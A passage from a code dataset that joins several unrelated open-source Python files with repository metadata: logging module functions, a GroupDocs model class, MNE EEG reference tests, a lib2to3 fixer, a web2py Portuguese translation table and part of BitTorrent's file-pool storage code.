Return a logger with the specified name, creating it if necessary.
If no name is specified, return the root logger.
"""
if name:
return Logger.manager.getLogger(name)
else:
return root
def critical(msg, *args, **kwargs):
"""
Log a message with severity 'CRITICAL' on the root logger. If the logger
has no handlers, call basicConfig() to add a console handler with a
pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
fatal = critical
def error(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger, with exception
information. If the logger has no handlers, basicConfig() is called to add
a console handler with a pre-defined format.
"""
kwargs['exc_info'] = True
error(msg, *args, **kwargs)
def warning(msg, *args, **kwargs):
"""
Log a message with severity 'WARNING' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
warnings.warn("The 'warn' function is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
warning(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
"""
Log a message with severity 'INFO' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
"""
Log a message with severity 'DEBUG' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level' on the root logger. If
the logger has no handlers, call basicConfig() to add a console handler
with a pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level):
"""
Disable all logging calls of severity 'level' and below.
"""
root.manager.disable = level
def shutdown(handlerList=_handlerList):
"""
Perform any cleanup actions in the logging system (e.g. flushing
buffers).
Should be called at application exit.
"""
for wr in reversed(handlerList[:]):
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h = wr()
if h:
try:
h.acquire()
h.flush()
h.close()
except (IOError, ValueError):
# Ignore errors which might be caused
# because handlers have been closed but
# references to them are still around at
# application exit.
pass
finally:
h.release()
except:
if raiseExceptions:
raise
#else, swallow
#Let's try and shutdown automatically on application exit...
import atexit
atexit.register(shutdown)
# Null handler
class NullHandler(Handler):
"""
This handler does nothing. It's intended to be used to avoid the
"No handlers could be found for logger XXX" one-off warning. This is
important for library code, which may contain code to log events. If a user
of the library does not configure logging, the one-off warning might be
produced; to avoid this, the library developer simply needs to instantiate
a NullHandler and add it to the top-level logger of the library module or
package.
"""
def handle(self, record):
"""Stub."""
def emit(self, record):
"""Stub."""
def createLock(self):
self.lock = None
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
    Implementation of showwarning which redirects to logging, which will first
check to see if the file parameter is None. If a file is specified, it will
delegate to the original warnings implementation of showwarning. Otherwise,
it will call warnings.formatwarning and will log the resulting string to a
warnings logger named "py.warnings" with level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
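# Illustrative sketch (not part of the original module): routing the warnings
# module through logging and back, per captureWarnings() above:
#
#     captureWarnings(True)    # warnings.warn(...) now logs to "py.warnings"
#     captureWarnings(False)   # restores the original warnings.showwarning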
| gpl-3.0 |
liosha2007/temporary-groupdocs-python-sdk | groupdocs/models/SignatureEnvelopeFieldLocationSettings.py | 2 | 1794 | #!/usr/bin/env python
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class SignatureEnvelopeFieldLocationSettings:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'page': 'int',
'locationX': 'float',
'locationY': 'float',
'locationWidth': 'float',
'locationHeight': 'float',
'fontName': 'str',
'fontColor': 'str',
'fontSize': 'float',
'fontBold': 'bool',
'fontItalic': 'bool',
'fontUnderline': 'bool',
'forceNewField': 'bool',
'align': 'int'
}
self.page = None # int
self.locationX = None # float
self.locationY = None # float
self.locationWidth = None # float
self.locationHeight = None # float
self.fontName = None # str
self.fontColor = None # str
self.fontSize = None # float
self.fontBold = None # bool
self.fontItalic = None # bool
self.fontUnderline = None # bool
self.forceNewField = None # bool
self.align = None # int
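    # Illustrative sketch (not part of the original model): populating a
    # location object, with field names taken from the swaggerTypes map above
    # (the values shown are arbitrary):
    #
    #     loc = SignatureEnvelopeFieldLocationSettings()
    #     loc.page, loc.locationX, loc.locationY = 1, 0.1, 0.2
    #     loc.locationWidth, loc.locationHeight = 0.25, 0.05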
| apache-2.0 |
matthew-tucker/mne-python | mne/io/tests/test_reference.py | 10 | 13045 | # Authors: Marijn van Vliet <[email protected]>
# Alexandre Gramfort <[email protected]>
# Teon Brooks <[email protected]>
#
# License: BSD (3-clause)
import warnings
import os.path as op
import numpy as np
from nose.tools import assert_true, assert_equal, assert_raises
from numpy.testing import assert_array_equal, assert_allclose
from mne import pick_types, Evoked, Epochs, read_events
from mne.io.constants import FIFF
from mne.io import (set_eeg_reference, set_bipolar_reference,
add_reference_channels)
from mne.io.proj import _has_eeg_average_ref_proj
from mne.io.reference import _apply_reference
from mne.datasets import testing
from mne.io import Raw
warnings.simplefilter('always') # enable b/c these tests throw warnings
data_dir = op.join(testing.data_path(download=False), 'MEG', 'sample')
fif_fname = op.join(data_dir, 'sample_audvis_trunc_raw.fif')
eve_fname = op.join(data_dir, 'sample_audvis_trunc_raw-eve.fif')
ave_fname = op.join(data_dir, 'sample_audvis_trunc-ave.fif')
def _test_reference(raw, reref, ref_data, ref_from):
"""Helper function to test whether a reference has been correctly
applied."""
# Separate EEG channels from other channel types
picks_eeg = pick_types(raw.info, meg=False, eeg=True, exclude='bads')
picks_other = pick_types(raw.info, meg=True, eeg=False, eog=True,
stim=True, exclude='bads')
    # Calculate indices of reference channels
picks_ref = [raw.ch_names.index(ch) for ch in ref_from]
# Get data
if isinstance(raw, Evoked):
_data = raw.data
_reref = reref.data
else:
_data = raw._data
_reref = reref._data
# Check that the ref has been properly computed
assert_array_equal(ref_data, _data[..., picks_ref, :].mean(-2))
# Get the raw EEG data and other channel data
raw_eeg_data = _data[..., picks_eeg, :]
raw_other_data = _data[..., picks_other, :]
# Get the rereferenced EEG data
reref_eeg_data = _reref[..., picks_eeg, :]
reref_other_data = _reref[..., picks_other, :]
# Undo rereferencing of EEG channels
if isinstance(raw, Epochs):
unref_eeg_data = reref_eeg_data + ref_data[:, np.newaxis, :]
else:
unref_eeg_data = reref_eeg_data + ref_data
    # Check that both EEG data and other data are the same
assert_allclose(raw_eeg_data, unref_eeg_data, 1e-6, atol=1e-15)
assert_allclose(raw_other_data, reref_other_data, 1e-6, atol=1e-15)
@testing.requires_testing_data
def test_apply_reference():
"""Test base function for rereferencing"""
raw = Raw(fif_fname, preload=True)
# Rereference raw data by creating a copy of original data
reref, ref_data = _apply_reference(raw, ref_from=['EEG 001', 'EEG 002'],
copy=True)
assert_true(reref.info['custom_ref_applied'])
_test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])
# The CAR reference projection should have been removed by the function
assert_true(not _has_eeg_average_ref_proj(reref.info['projs']))
# Test that disabling the reference does not break anything
reref, ref_data = _apply_reference(raw, [])
assert_array_equal(raw._data, reref._data)
# Test that data is modified in place when copy=False
reref, ref_data = _apply_reference(raw, ['EEG 001', 'EEG 002'],
copy=False)
assert_true(raw is reref)
# Test re-referencing Epochs object
raw = Raw(fif_fname, preload=False, add_eeg_ref=False)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
reref, ref_data = _apply_reference(epochs, ref_from=['EEG 001', 'EEG 002'],
copy=True)
assert_true(reref.info['custom_ref_applied'])
_test_reference(epochs, reref, ref_data, ['EEG 001', 'EEG 002'])
# Test re-referencing Evoked object
evoked = epochs.average()
reref, ref_data = _apply_reference(evoked, ref_from=['EEG 001', 'EEG 002'],
copy=True)
assert_true(reref.info['custom_ref_applied'])
_test_reference(evoked, reref, ref_data, ['EEG 001', 'EEG 002'])
# Test invalid input
raw_np = Raw(fif_fname, preload=False)
assert_raises(RuntimeError, _apply_reference, raw_np, ['EEG 001'])
@testing.requires_testing_data
def test_set_eeg_reference():
"""Test rereference eeg data"""
raw = Raw(fif_fname, preload=True)
raw.info['projs'] = []
# Test setting an average reference
assert_true(not _has_eeg_average_ref_proj(raw.info['projs']))
reref, ref_data = set_eeg_reference(raw)
assert_true(_has_eeg_average_ref_proj(reref.info['projs']))
assert_true(ref_data is None)
# Test setting an average reference when one was already present
reref, ref_data = set_eeg_reference(raw, copy=False)
assert_true(ref_data is None)
# Rereference raw data by creating a copy of original data
reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'], copy=True)
assert_true(reref.info['custom_ref_applied'])
_test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])
# Test that data is modified in place when copy=False
reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'],
copy=False)
assert_true(raw is reref)
@testing.requires_testing_data
def test_set_bipolar_reference():
"""Test bipolar referencing"""
raw = Raw(fif_fname, preload=True)
reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002', 'bipolar',
{'kind': FIFF.FIFFV_EOG_CH,
'extra': 'some extra value'})
assert_true(reref.info['custom_ref_applied'])
# Compare result to a manual calculation
a = raw.pick_channels(['EEG 001', 'EEG 002'], copy=True)
a = a._data[0, :] - a._data[1, :]
b = reref.pick_channels(['bipolar'], copy=True)._data[0, :]
assert_allclose(a, b)
# Original channels should be replaced by a virtual one
assert_true('EEG 001' not in reref.ch_names)
assert_true('EEG 002' not in reref.ch_names)
assert_true('bipolar' in reref.ch_names)
# Check channel information
bp_info = reref.info['chs'][reref.ch_names.index('bipolar')]
an_info = reref.info['chs'][raw.ch_names.index('EEG 001')]
for key in bp_info:
if key == 'loc' or key == 'eeg_loc':
assert_array_equal(bp_info[key], 0)
elif key == 'coil_type':
assert_equal(bp_info[key], FIFF.FIFFV_COIL_EEG_BIPOLAR)
elif key == 'kind':
assert_equal(bp_info[key], FIFF.FIFFV_EOG_CH)
else:
assert_equal(bp_info[key], an_info[key])
assert_equal(bp_info['extra'], 'some extra value')
# Minimalist call
reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002')
assert_true('EEG 001-EEG 002' in reref.ch_names)
# Test creating a bipolar reference that doesn't involve EEG channels:
# it should not set the custom_ref_applied flag
reref = set_bipolar_reference(raw, 'MEG 0111', 'MEG 0112',
ch_info={'kind': FIFF.FIFFV_MEG_CH})
assert_true(not reref.info['custom_ref_applied'])
assert_true('MEG 0111-MEG 0112' in reref.ch_names)
# Test a battery of invalid inputs
assert_raises(ValueError, set_bipolar_reference, raw,
'EEG 001', ['EEG 002', 'EEG 003'], 'bipolar')
assert_raises(ValueError, set_bipolar_reference, raw,
['EEG 001', 'EEG 002'], 'EEG 003', 'bipolar')
assert_raises(ValueError, set_bipolar_reference, raw,
'EEG 001', 'EEG 002', ['bipolar1', 'bipolar2'])
assert_raises(ValueError, set_bipolar_reference, raw,
'EEG 001', 'EEG 002', 'bipolar',
ch_info=[{'foo': 'bar'}, {'foo': 'bar'}])
assert_raises(ValueError, set_bipolar_reference, raw,
'EEG 001', 'EEG 002', ch_name='EEG 003')
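# Illustrative usage sketch (not part of the original test module), based only
# on the calls exercised above:
#
#     raw = Raw(fif_fname, preload=True)
#     reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002', 'bipolar')
#     # 'EEG 001' and 'EEG 002' are replaced by the virtual 'bipolar' channel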
@testing.requires_testing_data
def test_add_reference():
raw = Raw(fif_fname, preload=True)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
# check if channel already exists
assert_raises(ValueError, add_reference_channels,
raw, raw.info['ch_names'][0])
# add reference channel to Raw
raw_ref = add_reference_channels(raw, 'Ref', copy=True)
assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 1)
assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])
orig_nchan = raw.info['nchan']
raw = add_reference_channels(raw, 'Ref', copy=False)
assert_array_equal(raw._data, raw_ref._data)
assert_equal(raw.info['nchan'], orig_nchan + 1)
ref_idx = raw.ch_names.index('Ref')
ref_data, _ = raw[ref_idx]
assert_array_equal(ref_data, 0)
# add two reference channels to Raw
raw = Raw(fif_fname, preload=True)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
assert_raises(ValueError, add_reference_channels, raw,
raw.info['ch_names'][0])
raw_ref = add_reference_channels(raw, ['M1', 'M2'], copy=True)
assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 2)
assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])
raw = add_reference_channels(raw, ['M1', 'M2'], copy=False)
ref_idx = raw.ch_names.index('M1')
ref_idy = raw.ch_names.index('M2')
ref_data, _ = raw[[ref_idx, ref_idy]]
assert_array_equal(ref_data, 0)
# add reference channel to epochs
raw = Raw(fif_fname, preload=True)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
epochs_ref = add_reference_channels(epochs, 'Ref', copy=True)
assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 1)
ref_idx = epochs_ref.ch_names.index('Ref')
ref_data = epochs_ref.get_data()[:, ref_idx, :]
assert_array_equal(ref_data, 0)
picks_eeg = pick_types(epochs.info, meg=False, eeg=True)
assert_array_equal(epochs.get_data()[:, picks_eeg, :],
epochs_ref.get_data()[:, picks_eeg, :])
# add two reference channels to epochs
raw = Raw(fif_fname, preload=True)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
epochs_ref = add_reference_channels(epochs, ['M1', 'M2'], copy=True)
assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 2)
ref_idx = epochs_ref.ch_names.index('M1')
ref_idy = epochs_ref.ch_names.index('M2')
ref_data = epochs_ref.get_data()[:, [ref_idx, ref_idy], :]
assert_array_equal(ref_data, 0)
picks_eeg = pick_types(epochs.info, meg=False, eeg=True)
assert_array_equal(epochs.get_data()[:, picks_eeg, :],
epochs_ref.get_data()[:, picks_eeg, :])
# add reference channel to evoked
raw = Raw(fif_fname, preload=True)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
evoked = epochs.average()
evoked_ref = add_reference_channels(evoked, 'Ref', copy=True)
assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 1)
ref_idx = evoked_ref.ch_names.index('Ref')
ref_data = evoked_ref.data[ref_idx, :]
assert_array_equal(ref_data, 0)
picks_eeg = pick_types(evoked.info, meg=False, eeg=True)
assert_array_equal(evoked.data[picks_eeg, :],
evoked_ref.data[picks_eeg, :])
# add two reference channels to evoked
raw = Raw(fif_fname, preload=True)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
evoked = epochs.average()
evoked_ref = add_reference_channels(evoked, ['M1', 'M2'], copy=True)
assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 2)
ref_idx = evoked_ref.ch_names.index('M1')
ref_idy = evoked_ref.ch_names.index('M2')
ref_data = evoked_ref.data[[ref_idx, ref_idy], :]
assert_array_equal(ref_data, 0)
picks_eeg = pick_types(evoked.info, meg=False, eeg=True)
assert_array_equal(evoked.data[picks_eeg, :],
evoked_ref.data[picks_eeg, :])
# Test invalid inputs
raw_np = Raw(fif_fname, preload=False)
assert_raises(RuntimeError, add_reference_channels, raw_np, ['Ref'])
assert_raises(ValueError, add_reference_channels, raw, 1)
| bsd-3-clause |
valkjsaaa/sl4a | python/src/Lib/lib2to3/fixes/fix_intern.py | 49 | 1368 | # Copyright 2006 Georg Brandl.
# Licensed to PSF under a Contributor Agreement.
"""Fixer for intern().
intern(s) -> sys.intern(s)"""
# Local imports
from .. import pytree
from .. import fixer_base
from ..fixer_util import Name, Attr, touch_import
class FixIntern(fixer_base.BaseFix):
PATTERN = """
power< 'intern'
trailer< lpar='('
( not(arglist | argument<any '=' any>) obj=any
| obj=arglist<(not argument<any '=' any>) any ','> )
rpar=')' >
after=any*
>
"""
def transform(self, node, results):
syms = self.syms
obj = results["obj"].clone()
if obj.type == syms.arglist:
newarglist = obj.clone()
else:
newarglist = pytree.Node(syms.arglist, [obj.clone()])
after = results["after"]
if after:
after = [n.clone() for n in after]
new = pytree.Node(syms.power,
Attr(Name("sys"), Name("intern")) +
[pytree.Node(syms.trailer,
[results["lpar"].clone(),
newarglist,
results["rpar"].clone()])] + after)
new.set_prefix(node.get_prefix())
touch_import(None, 'sys', node)
return new
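    # Illustrative sketch (not part of the original fixer): the net effect of
    # transform() above on 2to3 input:
    #
    #     intern(s)       ->  sys.intern(s)
    #     intern(a + b)   ->  sys.intern(a + b)
    #
    # with the required 'import sys' added by touch_import().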
| apache-2.0 |
urrego093/proyecto_mv | applications/welcome/languages/pt-br.py | 88 | 7249 | # -*- coding: utf-8 -*-
{
'!langcode!': 'pt-br',
'!langname!': 'Português (do Brasil)',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" é uma expressão opcional como "campo1=\'novovalor\'". Você não pode atualizar ou apagar os resultados de um JOIN',
'%s %%{row} deleted': '%s linhas apagadas',
'%s %%{row} updated': '%s linhas atualizadas',
'%s selected': '%s selecionado',
'%Y-%m-%d': '%d-%m-%Y',
'%Y-%m-%d %H:%M:%S': '%d-%m-%Y %H:%M:%S',
'About': 'Sobre',
'Access Control': 'Controle de Acesso',
'Administrative Interface': 'Interface Administrativa',
'@markmin\x01An error occured, please [[reload %s]] the page': 'Ocorreu um erro, por favor [[reload %s]] a página',
'Administrative interface': 'Interface administrativa',
'Ajax Recipes': 'Receitas de Ajax',
'appadmin is disabled because insecure channel': 'Administração desativada porque o canal não é seguro',
'Are you sure you want to delete this object?': 'Você está certo que deseja apagar este objeto?',
'Available Databases and Tables': 'Bancos de dados e tabelas disponíveis',
'Buy this book': 'Compre o livro',
'cache': 'cache',
'Cache': 'Cache',
'Cache Keys': 'Chaves de cache',
'Cannot be empty': 'Não pode ser vazio',
'change password': 'modificar senha',
'Check to delete': 'Marque para apagar',
'Clear CACHE?': 'Limpar CACHE?',
'Clear DISK': 'Limpar DISCO',
'Clear RAM': 'Limpar memória RAM',
'Client IP': 'IP do cliente',
'Community': 'Comunidade',
'Components and Plugins': 'Componentes e Plugins',
'Controller': 'Controlador',
'Copyright': 'Copyright',
'Current request': 'Requisição atual',
'Current response': 'Resposta atual',
'Current session': 'Sessão atual',
'customize me!': 'Personalize-me!',
'data uploaded': 'dados enviados',
'Database': 'banco de dados',
'Database %s select': 'Selecionar banco de dados %s',
'db': 'bd',
'DB Model': 'Modelo BD',
'Delete:': 'Apagar:',
'Demo': 'Demo',
'Deployment Recipes': 'Receitas de deploy',
'Description': 'Descrição',
'design': 'projeto',
'DISK': 'DISK',
'Disk Cache Keys': 'Chaves do Cache de Disco',
'Disk Cleared': 'Disco Limpo',
'Documentation': 'Documentação',
"Don't know what to do?": "Não sabe o que fazer?",
'done!': 'concluído!',
'Download': 'Download',
'E-mail': 'E-mail',
'Edit': 'Editar',
'Edit current record': 'Editar o registro atual',
'edit profile': 'editar perfil',
'Edit This App': 'Editar esta aplicação',
'Email and SMS': 'Email e SMS',
'Errors': 'Erros',
'Enter an integer between %(min)g and %(max)g': 'Informe um valor inteiro entre %(min)g e %(max)g',
'export as csv file': 'exportar como um arquivo csv',
'FAQ': 'Perguntas frequentes',
'First name': 'Nome',
'Forms and Validators': 'Formulários e Validadores',
'Free Applications': 'Aplicações gratuitas',
'Group ID': 'ID do Grupo',
'Groups': 'Grupos',
'Hello World': 'Olá Mundo',
'Home': 'Principal',
'How did you get here?': 'Como você chegou aqui?',
'import': 'importar',
'Import/Export': 'Importar/Exportar',
'Index': 'Início',
'insert new': 'inserir novo',
'insert new %s': 'inserir novo %s',
'Internal State': 'Estado Interno',
'Introduction': 'Introdução',
'Invalid email': 'Email inválido',
'Invalid Query': 'Consulta Inválida',
'invalid request': 'requisição inválida',
'Key': 'Chave',
'Last name': 'Sobrenome',
'Layout': 'Layout',
'Layout Plugins': 'Plugins de Layout',
'Layouts': 'Layouts',
'Live chat': 'Chat ao vivo',
'Live Chat': 'Chat ao vivo',
'login': 'Entrar',
'Login': 'Autentique-se',
'logout': 'Sair',
'Lost Password': 'Esqueceu sua senha?',
'lost password?': 'esqueceu sua senha?',
'Main Menu': 'Menu Principal',
'Manage Cache': 'Gerenciar Cache',
'Menu Model': 'Modelo de Menu',
'My Sites': 'Meus sites',
'Name': 'Nome',
'New Record': 'Novo Registro',
'new record inserted': 'novo registro inserido',
'next 100 rows': 'próximas 100 linhas',
'No databases in this application': 'Não há bancos de dados nesta aplicação',
'Object or table name': 'Nome do objeto ou da tabela',
'Online examples': 'Exemplos online',
'or import from csv file': 'ou importar de um arquivo csv',
'Origin': 'Origem',
'Other Plugins': 'Outros Plugins',
'Other Recipes': 'Outras Receitas',
'Overview': 'Visão Geral',
'Password': 'Senha',
'Plugins': 'Plugins',
'Powered by': 'Desenvolvido com',
'Preface': 'Prefácio',
'previous 100 rows': '100 linhas anteriores',
'Python': 'Python',
'Query:': 'Consulta:',
'Quick Examples': 'Exemplos rápidos',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram Cleared',
'Recipes': 'Receitas',
'Record': 'Registro',
'record does not exist': 'registro não existe',
'Record ID': 'ID do Registro',
'Record id': 'id do registro',
'Register': 'Registre-se',
'register': 'Registre-se',
'Registration key': 'Chave de registro',
'Reset Password key': 'Resetar chave de senha',
'Resources': 'Recursos',
'Role': 'Papel',
'Registration identifier': 'Idenficador de registro',
'Rows in Table': 'Linhas na tabela',
'Rows selected': 'Linhas selecionadas',
'Semantic': 'Semântico',
'Services': 'Serviços',
'Size of cache:': 'Tamanho do cache:',
'state': 'estado',
'Statistics': 'Estatísticas',
'Stylesheet': 'Folha de estilo',
'submit': 'enviar',
'Support': 'Suporte',
'Sure you want to delete this object?': 'Está certo(a) que deseja apagar este objeto?',
'Table': 'Tabela',
'Table name': 'Nome da tabela',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'Uma "consulta" é uma condição como "db.tabela1.campo1==\'valor\'". Expressões como "db.tabela1.campo1==db.tabela2.campo2" resultam em um JOIN SQL.',
'The Core': 'The Core',
'The output of the file is a dictionary that was rendered by the view %s': 'A saída do arquivo é um dicionário que foi apresentado pela visão %s',
'The Views': 'As views',
'This App': 'Esta aplicação',
'This email already has an account': 'Este email já tem uma conta',
'This is a copy of the scaffolding application': 'Isto é uma cópia da aplicação modelo',
'Time in Cache (h:m:s)': 'Tempo em Cache (h:m:s)',
'Timestamp': 'Timestamp',
'Twitter': 'Twitter',
'unable to parse csv file': 'não foi possível analisar arquivo csv',
'Update:': 'Atualizar:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) para AND, (...)|(...) para OR, e ~(...) para NOT para construir consultas mais complexas.',
'User ID': 'ID do Usuário',
'User Voice': 'Opinião dos usuários',
'Videos': 'Vídeos',
'View': 'Visualização',
'Web2py': 'Web2py',
'Welcome': 'Bem-vindo',
'Welcome %s': 'Bem-vindo %s',
'Welcome to web2py': 'Bem-vindo ao web2py',
'Welcome to web2py!': 'Bem-vindo ao web2py!',
'Which called the function %s located in the file %s': 'Que chamou a função %s localizada no arquivo %s',
'You are successfully running web2py': 'Você está executando o web2py com sucesso',
'You are successfully running web2py.': 'Você está executando o web2py com sucesso.',
'You can modify this application and adapt it to your needs': 'Você pode modificar esta aplicação e adaptá-la às suas necessidades',
'You visited the url %s': 'Você acessou a url %s',
'Working...': 'Trabalhando...',
}
| gpl-3.0 |
rabimba/p2pScrapper | BitTorrent-5.2.2/BitTorrent/Storage_threadpool.py | 6 | 14110 | # The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Bram Cohen and Greg Hazel
import os
import sys
import Queue
from bisect import bisect_right
from BTL.translation import _
from BTL.obsoletepythonsupport import set
from BitTorrent import BTFailure
from BTL.defer import Deferred, ThreadedDeferred, Failure, wrap_task
from BTL.yielddefer import launch_coroutine
from BitTorrent.platform import get_allocated_regions
from BTL.sparse_set import SparseSet
from BTL.DictWithLists import DictWithLists, DictWithSets
import BTL.stackthreading as threading
from BitTorrent.Storage_base import open_sparse_file, make_file_sparse
from BitTorrent.Storage_base import bad_libc_workaround, is_open_for_write
from BitTorrent.Storage_base import UnregisteredFileException
class FilePool(object):
def __init__(self, doneflag, add_task, external_add_task,
max_files_open, num_disk_threads):
self.doneflag = doneflag
self.external_add_task = external_add_task
self.file_to_torrent = {}
self.free_handle_condition = threading.Condition()
self.active_file_to_handles = DictWithSets()
self.open_file_to_handles = DictWithLists()
self.set_max_files_open(max_files_open)
self.diskq = Queue.Queue()
for i in xrange(num_disk_threads):
t = threading.Thread(target=self._disk_thread,
name="disk_thread-%s" % (i+1))
t.start()
self.doneflag.addCallback(self.finalize)
def finalize(self, r=None):
# re-queue self so all threads die. we end up with one extra event on
# the queue, but who cares.
self._create_op(self.finalize)
def close_all(self):
failures = {}
self.free_handle_condition.acquire()
while self.get_open_file_count() > 0:
while len(self.open_file_to_handles) > 0:
filename, handle = self.open_file_to_handles.popitem()
try:
handle.close()
except Exception, e:
failures[self.file_to_torrent[filename]] = e
self.free_handle_condition.notify()
if self.get_open_file_count() > 0:
self.free_handle_condition.wait(1)
self.free_handle_condition.release()
for torrent, e in failures.iteritems():
torrent.got_exception(e)
def close_files(self, file_set):
failures = set()
self.free_handle_condition.acquire()
done = False
while not done:
filenames = list(self.open_file_to_handles.iterkeys())
for filename in filenames:
if filename not in file_set:
continue
handles = self.open_file_to_handles.poprow(filename)
for handle in handles:
try:
handle.close()
except Exception, e:
failures.add(e)
self.free_handle_condition.notify()
done = True
for filename in file_set.iterkeys():
if filename in self.active_file_to_handles:
done = False
break
if not done:
self.free_handle_condition.wait(0.5)
self.free_handle_condition.release()
if len(failures) > 0:
raise failures.pop()
def set_max_files_open(self, max_files_open):
if max_files_open <= 0:
max_files_open = 1e100
self.max_files_open = max_files_open
self.close_all()
def add_files(self, files, torrent):
for filename in files:
if filename in self.file_to_torrent:
raise BTFailure(_("File %s belongs to another running torrent")
% filename)
for filename in files:
self.file_to_torrent[filename] = torrent
def remove_files(self, files):
for filename in files:
del self.file_to_torrent[filename]
def _ensure_exists(self, filename, length=0):
if not os.path.exists(filename):
f = os.path.split(filename)[0]
if f != '' and not os.path.exists(f):
os.makedirs(f)
f = file(filename, 'wb')
make_file_sparse(filename, f, length)
f.close()
def get_open_file_count(self):
t = self.open_file_to_handles.total_length()
t += self.active_file_to_handles.total_length()
return t
def acquire_handle(self, filename, for_write, length=0):
# this will block until a new file handle can be made
self.free_handle_condition.acquire()
if filename not in self.file_to_torrent:
self.free_handle_condition.release()
raise UnregisteredFileException()
while self.active_file_to_handles.total_length() == self.max_files_open:
self.free_handle_condition.wait()
if filename in self.open_file_to_handles:
handle = self.open_file_to_handles.pop_from_row(filename)
if for_write and not is_open_for_write(handle.mode):
handle.close()
handle = open_sparse_file(filename, 'rb+', length=length)
#elif not for_write and is_open_for_write(handle.mode):
# handle.close()
# handle = open_sparse_file(filename, 'rb', length=length)
else:
if self.get_open_file_count() == self.max_files_open:
oldfname, oldhandle = self.open_file_to_handles.popitem()
oldhandle.close()
self._ensure_exists(filename, length)
if for_write:
handle = open_sparse_file(filename, 'rb+', length=length)
else:
handle = open_sparse_file(filename, 'rb', length=length)
self.active_file_to_handles.push_to_row(filename, handle)
self.free_handle_condition.release()
return handle
def release_handle(self, filename, handle):
